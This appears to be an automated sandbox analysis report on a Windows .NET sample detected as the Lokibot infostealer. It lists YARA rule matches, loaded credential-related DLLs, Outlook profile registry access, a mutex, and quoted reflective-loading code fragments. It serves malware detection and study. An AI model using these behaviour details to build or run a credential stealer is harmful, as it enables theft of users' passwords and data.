Source: 0.2.SCB#89940578.exe.4756290.5.raw.unpack, type: UNPACKEDPE Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.SCB#89940578.exe.4756290.5.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 0.2.SCB#89940578.exe.4756290.5.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.SCB#89940578.exe.4756290.5.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.SCB#89940578.exe.4756290.5.unpack, type: UNPACKEDPE Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.SCB#89940578.exe.4756290.5.unpack, type: UNPACKEDPE Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.SCB#89940578.exe.473c270.6.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.SCB#89940578.exe.473c270.6.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.SCB#89940578.exe.473c270.6.raw.unpack, type: UNPACKEDPE Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.SCB#89940578.exe.473c270.6.raw.unpack, type: UNPACKEDPE Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.SCB#89940578.exe.473c270.6.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 2.2.SCB#89940578.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 2.2.SCB#89940578.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 2.2.SCB#89940578.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 2.2.SCB#89940578.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.SCB#89940578.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 0.2.SCB#89940578.exe.473c270.6.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.SCB#89940578.exe.473c270.6.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.SCB#89940578.exe.473c270.6.unpack, type: UNPACKEDPE Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.SCB#89940578.exe.473c270.6.unpack, type: UNPACKEDPE Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.SCB#89940578.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 2.2.SCB#89940578.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 2.2.SCB#89940578.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 2.2.SCB#89940578.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.SCB#89940578.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 0.2.SCB#89940578.exe.46e0650.7.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.SCB#89940578.exe.46e0650.7.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.SCB#89940578.exe.46e0650.7.raw.unpack, type: UNPACKEDPE Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.SCB#89940578.exe.46e0650.7.raw.unpack, type: UNPACKEDPE Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.SCB#89940578.exe.46e0650.7.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 0.2.SCB#89940578.exe.4684a30.4.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.SCB#89940578.exe.4684a30.4.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.SCB#89940578.exe.4684a30.4.raw.unpack, type: UNPACKEDPE Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.SCB#89940578.exe.4684a30.4.raw.unpack, type: UNPACKEDPE Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.SCB#89940578.exe.4684a30.4.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 00000000.00000002.1705748032.0000000002CD6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000000.00000002.1705748032.0000000002CD6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000000.00000002.1705748032.0000000002CD6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.2811909354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000002.00000002.2811909354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000002.00000002.2811909354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 00000002.00000002.2811909354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.2811909354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 00000000.00000002.1706474563.0000000004756000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000000.00000002.1706474563.0000000004756000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000000.00000002.1706474563.0000000004756000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.1706474563.0000000004507000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000000.00000002.1706474563.0000000004507000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000000.00000002.1706474563.0000000004507000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: SCB#89940578.exe PID: 7112, type: MEMORYSTR Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: Process Memory Space: SCB#89940578.exe PID: 7272, type: MEMORYSTR Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: SCB#89940578.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 0.2.SCB#89940578.exe.7be0000.10.raw.unpack, V4uC3Iifq56IKQcfry.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.SCB#89940578.exe.7be0000.10.raw.unpack, V4uC3Iifq56IKQcfry.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.SCB#89940578.exe.3b19970.8.raw.unpack, V4uC3Iifq56IKQcfry.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.SCB#89940578.exe.3b19970.8.raw.unpack, V4uC3Iifq56IKQcfry.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.SCB#89940578.exe.4684a30.4.raw.unpack, Ik0ivW0xlAKcCUFkH9.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.SCB#89940578.exe.9fd0000.11.raw.unpack, Ik0ivW0xlAKcCUFkH9.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.SCB#89940578.exe.46e0650.7.raw.unpack, Ik0ivW0xlAKcCUFkH9.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.SCB#89940578.exe.9fd0000.11.raw.unpack, aAvuH1Zy2CffGkLMu1.cs Security API names: _0020.SetAccessControl
Source: 0.2.SCB#89940578.exe.9fd0000.11.raw.unpack, aAvuH1Zy2CffGkLMu1.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.SCB#89940578.exe.9fd0000.11.raw.unpack, aAvuH1Zy2CffGkLMu1.cs Security API names: _0020.AddAccessRule
Source: 0.2.SCB#89940578.exe.46e0650.7.raw.unpack, aAvuH1Zy2CffGkLMu1.cs Security API names: _0020.SetAccessControl
Source: 0.2.SCB#89940578.exe.46e0650.7.raw.unpack, aAvuH1Zy2CffGkLMu1.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.SCB#89940578.exe.46e0650.7.raw.unpack, aAvuH1Zy2CffGkLMu1.cs Security API names: _0020.AddAccessRule
Source: 0.2.SCB#89940578.exe.4684a30.4.raw.unpack, aAvuH1Zy2CffGkLMu1.cs Security API names: _0020.SetAccessControl
Source: 0.2.SCB#89940578.exe.4684a30.4.raw.unpack, aAvuH1Zy2CffGkLMu1.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.SCB#89940578.exe.4684a30.4.raw.unpack, aAvuH1Zy2CffGkLMu1.cs Security API names: _0020.AddAccessRule
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@3/3@0/1
Source: C:\Users\user\Desktop\SCB#89940578.exe Code function: 2_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges, 2_2_0040650A
Source: C:\Users\user\Desktop\SCB#89940578.exe Code function: 2_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize, 2_2_0040434D
Source: C:\Users\user\Desktop\SCB#89940578.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SCB#89940578.exe.log Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Mutant created: \Sessions\1\BaseNamedObjects\FDD42EE188E931437F4FBE2C
Source: C:\Users\user\Desktop\SCB#89940578.exe Mutant created: NULL
Source: SCB#89940578.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: SCB#89940578.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.98%
Source: C:\Users\user\Desktop\SCB#89940578.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\SCB#89940578.exe "C:\Users\user\Desktop\SCB#89940578.exe"
Source: C:\Users\user\Desktop\SCB#89940578.exe Process created: C:\Users\user\Desktop\SCB#89940578.exe "C:\Users\user\Desktop\SCB#89940578.exe"
Source: C:\Users\user\Desktop\SCB#89940578.exe Process created: C:\Users\user\Desktop\SCB#89940578.exe "C:\Users\user\Desktop\SCB#89940578.exe" Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Section loaded: dwrite.dll Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Section loaded: vaultcli.dll Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Section loaded: samcli.dll Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Section loaded: samlib.dll Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32 Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook Jump to behavior
Source: SCB#89940578.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: SCB#89940578.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

barindex
Source: 0.2.SCB#89940578.exe.7be0000.10.raw.unpack, V4uC3Iifq56IKQcfry.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 0.2.SCB#89940578.exe.3b19970.8.raw.unpack, V4uC3Iifq56IKQcfry.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: SCB#89940578.exe, Customer.cs .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
Source: 0.2.SCB#89940578.exe.4684a30.4.raw.unpack, aAvuH1Zy2CffGkLMu1.cs .Net Code: OGs7AAbB2r System.Reflection.Assembly.Load(byte[])
Source: 0.2.SCB#89940578.exe.9fd0000.11.raw.unpack, aAvuH1Zy2CffGkLMu1.cs .Net Code: OGs7AAbB2r System.Reflection.Assembly.Load(byte[])
Source: 0.2.SCB#89940578.exe.46e0650.7.raw.unpack, aAvuH1Zy2CffGkLMu1.cs .Net Code: OGs7AAbB2r System.Reflection.Assembly.Load(byte[])
Source: Yara match File source: 0.2.SCB#89940578.exe.4756290.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SCB#89940578.exe.4756290.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SCB#89940578.exe.473c270.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.SCB#89940578.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SCB#89940578.exe.473c270.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.SCB#89940578.exe.400000.0.unpack, type: UNPACKEDPE
